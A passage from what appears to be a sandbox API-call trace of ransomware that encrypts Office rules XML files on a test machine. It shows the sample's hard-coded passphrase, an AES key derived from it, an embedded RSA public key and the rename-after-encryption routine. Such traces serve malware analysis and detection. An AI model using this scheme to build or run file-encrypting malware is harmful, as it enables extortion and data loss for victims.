lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.700] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.700] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.700] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.700] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.700] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.700] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.700] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.700] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.700] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.701] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.701] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.701] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.701] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.701] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.701] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.701] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.701] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.701] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.701] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.701] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.701] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.701] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.702] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.702] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.702] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.702] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.702] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.703] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.703] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.703] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.703] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.703] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.703] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.703] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.703] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.703] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.703] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.703] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.703] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x91, lpOverlapped=0x0) returned 1 [0268.703] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x91, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0xa0) returned 1 [0268.703] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0xa0, lpOverlapped=0x0) returned 1 [0268.704] CloseHandle (hObject=0x5d48) returned 1 [0268.704] CloseHandle (hObject=0x5d3c) returned 1 [0268.704] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\msaccess.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\msaccess.exe_rules.xml.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\msaccess.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\msaccess.exe_rules.xml"), bFailIfExists=0) returned 1 [0268.712] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\msaccess.exe_Rules.xml", dwFileAttributes=0x0) returned 1 [0268.712] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\msaccess.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\msaccess.exe_rules.xml.gsg")) returned 1 [0268.715] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\msaccess.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\msaccess.exe_rules.xml"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\msaccess.exe_Rules.xml.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\msaccess.exe_rules.xml.fuck")) returned 1 [0268.716] CryptDestroyHash (hHash=0x2e7fbc0) returned 1 [0268.716] CryptDestroyKey (hKey=0x2e7eb80) returned 1 [0268.717] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0268.717] FindNextFileA (in: hFindFile=0x29383f8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0268.717] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0268.717] GetLastError () returned 0x0 [0268.717] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\msoia.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\msoia.exe_rules.xml")) returned 0x20 [0268.717] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\msoia.exe_Rules.xml", dwFileAttributes=0x80) returned 1 [0268.718] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\msoia.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\msoia.exe_rules.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0268.720] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\msoia.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\msoia.exe_rules.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0268.721] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\msoia.exe_Rules.xml.gsg", dwFileAttributes=0x2) returned 1 [0268.722] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0268.725] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0268.725] lstrlenA (lpString="yzLScEfviKODKVbxMUZoAxYXzMlQm") returned 29 [0268.725] CryptHashData (hHash=0x2e7fbc0, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0268.725] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2e7fbc0, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2e7eb80) returned 1 [0268.725] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0268.725] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0268.725] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f26808) returned 1 [0268.726] CryptImportPublicKeyInfo (in: hCryptProv=0x2f26808, dwCertEncodingType=0x1, pInfo=0x2f2fed0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f2ff00*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f2ff08*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2e7f4c0) returned 1 [0268.726] CryptEncrypt (in: hKey=0x2e7f4c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0268.726] CryptEncrypt (in: hKey=0x2e7f4c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f25e78*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f25e78*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0268.726] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f25e78*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f25e78*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0268.727] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.728] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.728] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.740] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0xa9, lpOverlapped=0x0) returned 1 [0268.740] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0xa9, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0xb0) returned 1 [0268.740] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0xb0, lpOverlapped=0x0) returned 1 [0268.741] CloseHandle (hObject=0x5d3c) returned 1 [0268.741] CloseHandle (hObject=0x5d48) returned 1 [0268.745] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\msoia.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\msoia.exe_rules.xml.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\msoia.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\msoia.exe_rules.xml"), bFailIfExists=0) returned 1 [0268.752] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\msoia.exe_Rules.xml", dwFileAttributes=0x0) returned 1 [0268.753] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\msoia.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\msoia.exe_rules.xml.gsg")) returned 1 [0268.754] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\msoia.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\msoia.exe_rules.xml"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\msoia.exe_Rules.xml.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\msoia.exe_rules.xml.fuck")) returned 1 [0268.756] CryptDestroyHash (hHash=0x2e7fbc0) returned 1 [0268.756] CryptDestroyKey (hKey=0x2e7eb80) returned 1 [0268.756] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0268.756] FindNextFileA (in: hFindFile=0x29383f8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0268.756] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0268.756] GetLastError () returned 0x0 [0268.756] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\mspub.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\mspub.exe_rules.xml")) returned 0x20 [0268.756] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\mspub.exe_Rules.xml", dwFileAttributes=0x80) returned 1 [0268.757] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\mspub.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\mspub.exe_rules.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0268.758] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\mspub.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\mspub.exe_rules.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0268.759] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\mspub.exe_Rules.xml.gsg", dwFileAttributes=0x2) returned 1 [0268.760] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0268.763] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0268.763] lstrlenA (lpString="yzLScEfviKODKVbxMUZoAxYXzMlQm") returned 29 [0268.763] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb788, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0268.763] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2e7eb80) returned 1 [0268.763] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0268.764] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0268.764] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f25f88) returned 1 [0268.764] CryptImportPublicKeyInfo (in: hCryptProv=0x2f25f88, dwCertEncodingType=0x1, pInfo=0x2f2fe00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f2fe30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f2fe38*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28e8078) returned 1 [0268.764] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0268.764] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f26890*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f26890*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0268.765] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f26890*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f26890*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0268.766] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.782] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.782] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, 